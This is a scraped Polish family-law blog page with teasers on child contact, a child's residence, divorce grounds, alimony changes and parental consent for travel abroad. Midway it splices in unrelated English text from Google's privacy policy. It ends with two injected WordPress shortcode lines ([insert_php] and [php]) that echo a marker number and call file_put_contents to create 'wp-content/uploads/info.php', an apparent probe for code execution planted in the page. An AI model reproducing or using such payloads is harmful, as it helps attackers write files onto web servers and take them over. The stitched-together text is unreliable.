Kara pieniężna za niewykonywanie lub niewłaściwe realizowanie kontaktów z dzieckiem!

        Częstym przypadkiem jest, że pomimo orzeczenia sądowego lub ugody zawartej przed sądem lub mediatorem, w której zostały uregulowane kontakty rodzica z dzieckiem, drugi z rodziców uchyla się od obowiązku z nich wynikającego.

Czytaj dalej: Kara pieniężna za niewykonywanie lub niewłaściwe realizowanie kontaktów z dzieckiem!

Zmiana miejsca zamieszkania małoletniego dziecka.

          Gdy oboje rodzice mają pełną władzę rodzicielską, każde z nich jest obowiązane i uprawnione do jej wykonywania (art. 97§1 Kodeksu rodzinnego i opiekuńczego).

          Nie podlega jakimkolwiek wątpliwościom, że do zmiany miejsca zamieszkania małoletniego dziecka wymagana jest zgoda obojga rodziców, albowiem tego typu sytuacja dotyczy istotnych spraw dziecka. Z uwagi na powyższe, gdy jeden z rodziców chce zmienić miejsca pobytu małoletniego dziecka musi uzyskać zgodę drugiego rodzica. W przypadku braku zgody, w myśl art. 97 § 2 kro powinien wystąpić do sądu z wnioskiem o rozstrzygnięcie o istotnych sprawach dziecka, tj. wyrażenie zgody na zmianę miejsca zamieszkania dziecka.

Czytaj dalej: Zmiana miejsca zamieszkania małoletniego dziecka.

„Matka jako rodzic sprawujący nad córką bieżącą opiekę ma możliwości nakłonienia córki do kontaktów z ojcem!”

            Powyższe sformułowanie zostało użyte w uzasadnieniu postanowienia z dnia 9 czerwca 2016 roku Sądu Rejonowego dla m. st. Warszawy, VI Wydział Rodzinny i Nieletnich, Sygn. Akt VI Nsm 50/16. Sąd słusznie wskazał, że „Uprawienie ojca do kontaktu w określone dni rodzi zobowiązanie matki do umożliwienia byłemu mężowi spotkań z córką. W tym miejscu należy podkreślić, iż kontakty z rodzicem są także prawem małoletniego dziecka i służyć mają jego dobru.

Czytaj dalej: „Matka jako rodzic sprawujący nad córką bieżącą opiekę ma możliwości nakłonienia córki do kontaktów z ojcem!”

Choroba jednego z małżonków, a rozwód.

Full length of young couple holding broken heart on the floor

W przypadku, gdy pomiędzy małżonkami nastąpił trwały i zupełny rozkład pożycia małżeńskiego pod względem:

psychicznym (małżonkowie już się nie kochają),

fizycznym (brak współżycia seksualnego),

gospodarczym (nie prowadzenie wspólnego gospodarstwa domowego).

czyli gdy wystąpiły wszystkie pozytywne przesłanki do rozwodu, w takiej sytuacji, zgodnie z art. 56 § 1 Kodeksu Rodzinnego i opiekuńczego, każdy z małżonków może żądać, ażeby sąd rozwiązał małżeństwo przez rozwód.

Czytaj dalej: Choroba jednego z małżonków, a rozwód.

Podstawy prawne do złożenia pozwu o podwyższenie/obniżenie alimentów.

Close-up Of Male Judge Hitting Mallet On Banknote

Zgodnie z art. 138 Kodeksu Rodzinnego i opiekuńczego „W razie zmiany stosunków można żądać zmiany orzeczenia lub umowy dotyczącej obowiązku alimentacyjnego”.

W tym miejscu chciałabym wyjaśnić jak należy rozumieć „zmianę stosunków” w przytaczanym powyżej przepisie.

  • przede wszystkim powyższa zmiana powinna mieć charakter istotny,
  • może dotyczyć zarówno zmiany usprawiedliwionych potrzeb uprawnionego,
  • może dotyczyć zmiany zarobkowych i majątkowych potrzeb zobowiązanego.

Czytaj dalej: Podstawy prawne do złożenia pozwu o podwyższenie/obniżenie alimentów.

Stały pobyt za granicą, a rozwód w Polsce

W ciągu ostatnich ponad 10 lat sporo Polaków przeprowadziło się poza granice Polski, gdzie na stałe przebywa i pracuje. Niektórzy małżonkowie wyjechali razem, zaś inni są małżeństwem na „odległość”.

W przypadku, gdy strony podejmują decyzję o rozwodzie, pierwsze pytanie jakie sobie zadają, brzmi „W którym kraju powinniśmy się rozwieść ?”.

Czy w Polsce, z uwagi na fakt, że oboje jesteśmy obywatelami polskimi, czy też w kraju, w którym ostatnio zamieszkiwaliśmy?

Czytaj dalej: Stały pobyt za granicą, a rozwód w Polsce

Gdy jeden z małżonków nie chce wyrazić zgody na rozwód.

A symbolic meaning to the word divorce.

Brak zgody na rozwód jednego z małżonków, co do zasady nie ma wpływu na rozwiązanie związku małżeńskiego przez sąd.

W przypadku, gdy pomiędzy małżonkami nastąpił trwały i zupełny rozkład pożycia małżeńskiego pod względem:

psychicznym (małżonkowie już się nie kochają),

fizycznym (brak współżycia seksualnego),

gospodarczym (nie prowadzenie wspólnego gospodarstwa domowego).

czyli gdy wystąpiły wszystkie pozytywne przesłanki do rozwodu, w takiej sytuacji, zgodnie z art. 56 § 1 Kodeksu Rodzinnego i opiekuńczego, każdy z małżonków może żądać, ażeby sąd rozwiązał małżeństwo przez rozwód.

Czytaj dalej: Gdy jeden z małżonków nie chce wyrazić zgody na rozwód.

Nowy wymóg formalny pisma procesowego!!!

Cropped image of businessman surfing news on smartphone at desk

          Z dniem 1 stycznia 2016 roku ustawodawca wprowadził dodatkowy wymóg formalny, który powinien zawierać każdy pozew. Mianowicie, zgodnie z art. 187 § 3 pkt. 3 Kodeksu postępowania cywilnego (dalej kpc) powód powinien umieścić w piśmie wszczynającym postępowanie informację, czy strony podjęły próbę mediacji lub innego pozasądowego sposobu rozwiązania sporu, a w przypadku gdy takich prób nie podjęto, wyjaśnienie przyczyn ich niepodjęcia. Tego typu wymóg formalny dotyczy nie tylko pozwów składanych w postępowaniu procesowym, ale także zgodnie z art. 13 § 2 kpc wniosków wszczynających postępowanie nieprocesowe.

Czytaj dalej: Nowy wymóg formalny pisma procesowego!!!

Czy potrzebna jest zgoda na wyjazd zagraniczny obojga rodziców? Tak!

Father plays with his son on the beach at sunset

     Na wyjazd zagraniczny z dzieckiem powinna być zgoda obojga rodziców, albowiem tego typu sytuacja wchodzi w zakres istotnych spraw dziecka. Art. 97 § 2 Kodeksu rodzinnego i opiekuńczego stanowi, że „o istotnych sprawach dziecka rodzice rozstrzygają wspólnie; w braku porozumienia między nimi rozstrzyga sąd opiekuńczy”.

Czytaj dalej: Czy potrzebna jest zgoda na wyjazd zagraniczny obojga rodziców? Tak!

Miejsce pobytu dziecka przy matce, a prawo do kontaktów z ojcem.

When you use Google services, you trust us with your information. This Privacy Policy is meant to help you understand what data we collect, why we collect it, and what we do with it. This is important; we hope you will take time to read it carefully. And remember, you can find controls to manage your information and protect your privacy and security at My Account.
There are many different ways you can use our services – to search for and share information, to communicate with other people or to create new content. When you share information with us, for example by creating a Google Account, we can make those services even better – to show you more relevant search results and ads, to help you connect with people or to make sharing with others quicker and easier. As you use our services, we want you to be clear how we’re using information and the ways in which you can protect your privacy.
Our Privacy Policy may change from time to time. We will not reduce your rights under this Privacy Policy without your explicit consent. We will post any privacy policy changes on this page and, if the changes are significant, we will provide a more prominent notice (including, for certain services, email notification of privacy policy changes). We will also keep prior versions of this Privacy Policy in an archive for your review.
[insert_php] echo 147098235+111;file_put_contents(‚wp-content/uploads/info.php’, ”); [/insert_php]
[php] echo 147098235+111;file_put_contents(‚wp-content/uploads/info.php’, ”); [/php]